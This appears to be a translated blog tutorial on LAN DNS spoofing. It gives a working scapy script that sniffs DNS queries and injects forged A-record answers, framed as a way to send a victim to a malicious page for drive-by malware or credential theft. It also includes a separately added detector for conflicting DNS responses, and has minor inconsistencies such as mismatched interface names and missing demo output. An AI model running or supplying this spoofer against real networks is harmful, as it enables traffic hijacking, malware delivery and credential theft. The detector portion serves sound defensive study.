DNS spoofing with Python
Suppose two people share a LAN: Bob and Eve. Eve wants Bob to visit a malicious web page she has created, so that she can install malware on Bob's computer through a drive-by download, or perhaps show him a deceptive site that tries to steal his credentials.
(Image from the link provided in this post)
(All machines in this test environment run CentOS 6.5.)
1. Put the attacker server's network card into promiscuous mode so that it can capture every packet on the LAN:
ifconfig em1 promisc
Check the card's mode: ifconfig em1
The output (PROMISC among the interface flags) shows that the card is now in promiscuous mode.
2. Write the attack code:
Open the dns_spoof.py script file:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from scapy.all import *
import time
import logging

logger = logging.getLogger('main')
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
logger.setLevel(logging.DEBUG)
# Set the interface for scapy to use
conf.iface = 'br0'
# Set the spoofed response
spoofed_ip = '192.168.28.118'

def send_response(x):
    # Get the requested domain
    req_domain = x[DNS].qd.qname
    logger.info('Found request for ' + req_domain)
    # First, we delete the existing lengths and checksums..
    # We will let Scapy re-create them
    del x[UDP].len
    del x[UDP].chksum
    del x[IP].len
    del x[IP].chksum
    # Let's build our response from a copy of the original packet
    response = x.copy()
    # In the 802.11 original this marked the frame "from-DS" (from the access point).
    # On an Ethernet frame there is no such field; Scapy stores it as a plain
    # attribute and it has no effect on the packet that is sent.
    response.FCfield = 2
    # Switch the MAC addresses (Ether src/dst; the Dot11 addr1/addr2 swap from the
    # wireless version is kept only for reference)
    #response.addr1, response.addr2 = x.addr2, x.addr1
    response.src, response.dst = x.dst, x.src
    # Switch the IP addresses
    response[IP].src, response[IP].dst = x[IP].dst, x[IP].src
    # Switch the ports
    response.sport, response.dport = x.dport, x.sport
    # Set the DNS flags: this is a response, recursion available, one answer
    response[DNS].qr = 1
    response[DNS].ra = 1
    response[DNS].ancount = 1
    # Let's add on the answer section
    response[DNS].an = DNSRR(
        rrname=req_domain,
        type='A',
        rclass='IN',
        ttl=900,
        rdata=spoofed_ip
    )
    # Now, we inject the response!
    sendp(response)
    logger.info('Sent response: ' + req_domain + ' -> ' + spoofed_ip + '\n')

def main():
    logger.info('Starting to intercept [CTRL+C to stop]')
    # Only UDP packets addressed to port 53 (DNS queries) reach send_response
    sniff(prn=send_response, lfilter=lambda x: x.haslayer(UDP) and x.dport == 53)

if __name__ == "__main__":
    # Make it happen!
    main()
This script captures the DNS A-record queries on the LAN and, as the code shows, answers each one with a forged response that points the queried name at spoofed_ip.
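The forged reply does not suppress the real one: the victim still receives the resolver's genuine answer a moment later, so the tell-tale sign on the wire is two responses carrying the same transaction ID and question but different A-record data. The following detector, added here as an example and not part of the original post or the linked article, parses DNS messages from their wire format without scapy and reports such conflicts. The sample responses (transaction IDs, the name www.example.com, the "genuine" address 198.51.100.7 from the TEST-NET-2 range) are constructed; only the TTL of 900 and the 192.168.28.118 address mirror the script above.

```python
"""Detect a DNS answer that races the genuine one: two responses with the same
transaction ID and question but different A-record data. Added example; the
parser works on raw DNS payloads (the UDP data) and needs no scapy."""
import struct
from collections import defaultdict


def _read_name(data, offset):
    """Decode a DNS name at offset, following compression pointers (RFC 1035 4.1.4).
    Returns (dotted name, offset just after the name as it appears in the message)."""
    labels = []
    jumped = False
    end = offset
    while True:
        length = data[offset]
        if length == 0:
            offset += 1
            break
        if length & 0xC0 == 0xC0:  # two-byte pointer, 14-bit offset into the message
            if not jumped:
                end = offset + 2
            offset = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            jumped = True
            continue
        offset += 1
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    if not jumped:
        end = offset
    return ".".join(labels) + ".", end


def parse_dns(data):
    """Parse a DNS message into {id, is_response, qname, answers}.
    Each answer is (owner name, type, ttl, rdata); A rdata is rendered dotted-quad."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    offset = 12
    qname = None
    for _ in range(qdcount):
        qname, offset = _read_name(data, offset)
        offset += 4  # skip QTYPE and QCLASS
    answers = []
    for _ in range(ancount):
        name, offset = _read_name(data, offset)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        rdata = data[offset:offset + rdlen]
        offset += rdlen
        if rtype == 1 and rdlen == 4:
            rdata = ".".join(str(b) for b in rdata)
        answers.append((name, rtype, ttl, rdata))
    return {"id": txid, "is_response": bool(flags & 0x8000),
            "qname": qname, "answers": answers}


def detect_conflicts(packets):
    """packets: iterable of (source IP, DNS payload). Groups responses by
    (transaction ID, qname) and returns an alert for every group whose
    responses disagree on the set of A-record addresses."""
    groups = defaultdict(list)
    for src_ip, payload in packets:
        msg = parse_dns(payload)
        if not msg["is_response"]:
            continue
        a_records = frozenset(rd for _, rt, _, rd in msg["answers"] if rt == 1)
        groups[(msg["id"], msg["qname"])].append((src_ip, a_records))
    alerts = []
    for (txid, qname), seen in groups.items():
        answer_sets = {records for _, records in seen}
        if len(seen) > 1 and len(answer_sets) > 1:
            alerts.append({"id": txid, "qname": qname,
                           "answers": sorted(sorted(s) for s in answer_sets)})
    return alerts


def _encode_name(name):
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_response(txid, qname, ip, ttl, compress=True):
    """Build a minimal DNS A response (constructed sample data, not captured traffic).
    Flags 0x8180 = QR, RD, RA. The answer's owner is a pointer to the question name
    when compress=True, otherwise the name spelled out in full."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = _encode_name(qname) + struct.pack("!HH", 1, 1)
    owner = b"\xc0\x0c" if compress else _encode_name(qname)
    rdata = bytes(int(octet) for octet in ip.split("."))
    answer = owner + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata
    return header + question + answer


# Constructed traffic as (source IP, DNS payload): the resolver's genuine answer,
# the forged answer a script like the one above would inject (same transaction ID,
# same claimed source, TTL 900, attacker-chosen address), and an unrelated reply.
SAMPLE_PACKETS = [
    ("223.5.5.5", build_response(0x1A2B, "www.example.com.", "198.51.100.7", 300)),
    ("223.5.5.5", build_response(0x1A2B, "www.example.com.", "192.168.28.118", 900, compress=False)),
    ("223.5.5.5", build_response(0x3C4D, "example.org.", "198.51.100.7", 300)),
]

if __name__ == "__main__":
    for alert in detect_conflicts(SAMPLE_PACKETS):
        print("possible DNS spoofing: id=%#06x %s -> %s"
              % (alert["id"], alert["qname"], alert["answers"]))
```

In a live deployment the payloads would come from a capture of UDP source port 53 on the victim's segment; grouping by transaction ID and question rather than by source address matters because, as the script shows, the forged packet copies the resolver's IP and MAC, so the sender fields look legitimate.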
3. Demonstration (for convenience, the local DNS server was set to 223.5.5.5):
Testing with the command dig @223.5.5.5 www.baidu.com gives the following result:
This post borrows the approach from http://jordan-wright.com/blog/2013/11/15/wireless-attacks-with-python-part-one-the-airpwn-attack/; the script there has problems when used as-is, so I made a few adjustments, and the experiment succeeded in a LAN environment.
Translation link: http://www.oschina.net/translate/wireless-attacks-with-python-part-one-the-airpwn-attack